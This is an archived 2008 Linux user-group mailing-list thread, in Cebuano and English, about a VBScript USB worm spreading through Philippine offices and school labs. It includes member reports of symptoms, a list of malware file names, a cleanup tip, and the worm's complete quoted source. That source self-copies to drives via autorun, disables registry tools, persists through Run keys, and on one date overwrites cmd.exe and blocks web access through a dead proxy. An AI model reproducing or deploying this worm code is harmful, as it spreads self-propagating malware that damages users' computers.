Re: [klug] [OT] Malicious code from CDOC guy

Tue, 12 Feb 2008 15:59:30 -0800

Guys unsa na antivirus sa market ang makadetect na aning isetup ug transmit.exe (black pegasus) na variant? Samok man gud danhi sa office namo halos tanan na maapektuhan... Ang worst pa jud is pag adto ka sa M$ word, then click any of the menus, iya iclose ang tanan apps including explorer.exe den mu balik sa sinugdanan...
Im still trying to push linux into the environment... gakahadlok pa ang mga tao danhi sa OS, pero Im on the process of influencing them hehehe.... 


On 02 13, 08, at 1:01 AM, hard wyrd wrote:


The "scandal variant" of this script also generates [PEGASUS].TXT  
on some systems which contains "BLACK PEGASUS" Hacking Team from  
Agusan del Sur. And also mentions that he/she/they come from STI in  
Agusan.



That just confirms how prevalent this script is and is being  
exchanged in the underground too frequently.



On Feb 12, 2008 10:47 PM, Camilo III Lozano <[EMAIL PROTECTED]>  
wrote:

sa ako nabaw-an.. taga Quezon, Manila gahimo sa TTMS...

which is arch is right.. ang original kay...


 rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Main\Window Title", "I AM NOT A CORRUPT LIKE YOU"


hmmm... naa pod Funny UST scandal thingy ani... daghan man... mao  
mani uso karon... scripts na pangsinamok lang sa computer, pakamang  
sa computer na di ma detect sa anti-virus... mostly kay VB....


list ani nila sa akong na encounter sa XU internet lab kay...

autorun.*
TTM*.*
Desktop.*
imgkulot*.*
RECYCLER\INFO.exe
RECYCLER\RECYCLER.exe
RECYCLER\Desktop.ini
sysdll.exe
krag.exe


RavMon*.*
msv*.dll
scvhosts.exe
scvhost.exe
svhost.exe
C:\Windows\svhost.exe
C:\Windows\svhost32.exe
"New Folder".exe
"Funny UST Scandal.avi.exe"
smss.exe
jay.exe
transmit.exe


isetup.exe


most sila ga kalat kay sa flashdisk... naka hidden files, system  
files and read-only files....



then time to time.. ga usab ila name.. then ga improve ila pag  
kamang... last worst encounter nako kay even imo na gi safe mode,  
nag dagan gihapon sya... balig naka system na sya... even imo na gi  
delete sa regedit kay naa gihapon sya... msconfig, naa gihapon. ang  
last nako gibuhat kay gi delete nako ang mga RECYCLER sa tanan  
drive nako.. kay didto man sila diay gatago.. hehehehehe... so  
solve na dayun.. :)


amen...

===================================

On 2/12/08, Ron Michael Khu <[EMAIL PROTECTED]> wrote:
Obviously this is offtopic, since the guy's script can only
run in an OS which supports regedit.exe, wscript.exe and the
other MS-apps.

Choi gihapon ni iyang gibuhat... mo traverse sa tanan flashdrives
and then copy itself to them :D

pretty harmless compared to the other naught scripts but nonetheless
still annoying :D


"DOHHGS Ni TAGA CDOC"

Who wants to claim ownership for this script?
:D

any takers?


---------------------------------------------------------------------- 
-----------------

'THIS IS A MODIFIED VERSION BY: TTMS
'PROUD TO BE FILIPINO, NOT TO CORRUPTION!

On Error Resume Next

Dim mydate, myvbsalias, myvbsfile, mysource, winpath, winsyspath,
flashdrive, fs, mycmdfile, cmd, atr, tf, rg, nt, check, sd

mycmdfile = "cmd.exe"

mydate = month(now()) & day(now())
myvbsalias = "TTMS" & mydate
myvbsfile = myvbsalias & ".dll.vbs"

atr = "[autorun]" & vbCrLf & _
      "shellexecute=wscript.exe " & myvbsfile

Set fs = CreateObject("Scripting.FileSystemObject")

Dim mf, text, size

Set mf = fs.GetFile(WScript.ScriptFullname)

size = mf.size
check = mf.Drive.drivetype

Set text = mf.openastextstream(1, -2)

Do While Not text.atendofstream
   mysource = mysource & text.readline
   mysource = mysource & vbCrLf
Loop

Do
   Set winpath = fs.GetSpecialFolder(0)

   Set tf = fs.GetFile(winpath & "\" & myvbsfile)

   tf.Attributes = 32

   Set tf = fs.CreateTextFile(winpath & "\" & myvbsfile, 2, True)

   tf.Write mysource
   tf.Close

   Set tf = fs.GetFile(winpath & "\" & myvbsfile)

   tf.Attributes = 39

   If (mydate = "318") Then
      Set winsyspath = fs.GetSpecialFolder(1)

      cmd = "@echo off" & vbCrLf & _
            "wscript " & winpath & "\" & myvbsfile

      Set tf = fs.GetFile(winsyspath & "\" & mycmdfile)

      tf.Attributes = 32

      Set tf = fs.CreateTextFile(winsyspath & "\" & mycmdfile, 2)

      tf.Write cmd
      tf.Close

      rg.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\ProxyEnable", 1, "REG_DWORD"
      rg.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\ProxyServer", "0.0.0.0:80"

      rg.RegWrite

"HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer 
\Control

Panel\Connection Settings\Connwiz Admin Lock", 1, "REG_DWORD"
  End If

  For Each flashdrive In fs.drives
      If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And
flashdrive.Path <> "A:" Then
         Set tf = fs.GetFile(flashdrive.Path & "\" & myvbsfile)

         tf.Attributes = 32

         Set tf = fs.CreateTextFile(flashdrive.Path & "\" & myvbsfile,
2, True)

         tf.Write mysource
         tf.Close

         Set tf = fs.GetFile(flashdrive.Path & "\" & myvbsfile)

         tf.Attributes = 39

         Set tf = fs.GetFile(flashdrive.Path & "\autorun.inf")

         tf.Attributes = 32


         Set tf = fs.CreateTextFile(flashdrive.Path &  
"\autorun.inf", 2,

True)

         tf.Write atr
         tf.Close

         Set tf = fs.GetFile(flashdrive.Path & "\autorun.inf")

         tf.Attributes = 39
      End If
   Next

   Set rg = CreateObject("WScript.Shell")

   rg.RegWrite

"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion 
\Policies\System\DisableRegistryTools",

1, "REG_DWORD"

   rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet

Explorer\Main\Window Title", "DOHHGS Ni TAGA CDOC WARNING GUBA NA  
IMO PC"


   rg.RegWrite

"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion 
\RunServices\MSConfig",

winpath & "\" & myvbsfile
   rg.RegWrite

"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run 
\MSConfig",

winpath & "\" & myvbsfile


   If check <> 1 Then
      WScript.sleep 200000
   End If

Loop While (check <> 1)

Set sd = CreateObject("WScript.Shell")

sd.run winpath & "\explorer.exe /e,/select, " & WScript.ScriptFullname

_________________________________________________
Kagay-Anon Linux Users' Group (KLUG) Mailing List
[email protected] (http://cdo.linux.org.ph)
Searchable Archives: http://archives.free.net.ph



--
--------------------
http://www.metacatalyst.com
http://www.metacatalyst.org
http://www.zabyer.org

Got my Own Hacker Key:
v3sw3BHhw5ln2pr5OFPck3ma2u4MLw5XVm+5l5UCi5Ne4t3b5en5g5RaIs5MSr3p2
http://www.hackerkey.com

Registered Linux User: #439468
_________________________________________________
Kagay-Anon Linux Users' Group (KLUG) Mailing List
[email protected] (http://cdo.linux.org.ph)
Searchable Archives: http://archives.free.net.ph



--
"A dog that has no bite, barks loudest."
Registered Linux User #400165
http://baudizm.blogsome.com
http://www.bayanihanbooks.com

Full-Disclosure,LARTC,Open-ITLUG, PRUG, KLUG, linuxusersgroup,  
sybase.public.ase.linux

_________________________________________________
Kagay-Anon Linux Users' Group (KLUG) Mailing List
[email protected] (http://cdo.linux.org.ph)
Searchable Archives: http://archives.free.net.ph



_________________________________________________
Kagay-Anon Linux Users' Group (KLUG) Mailing List
[email protected] (http://cdo.linux.org.ph)
Searchable Archives: http://archives.free.net.ph





















					Reply via email to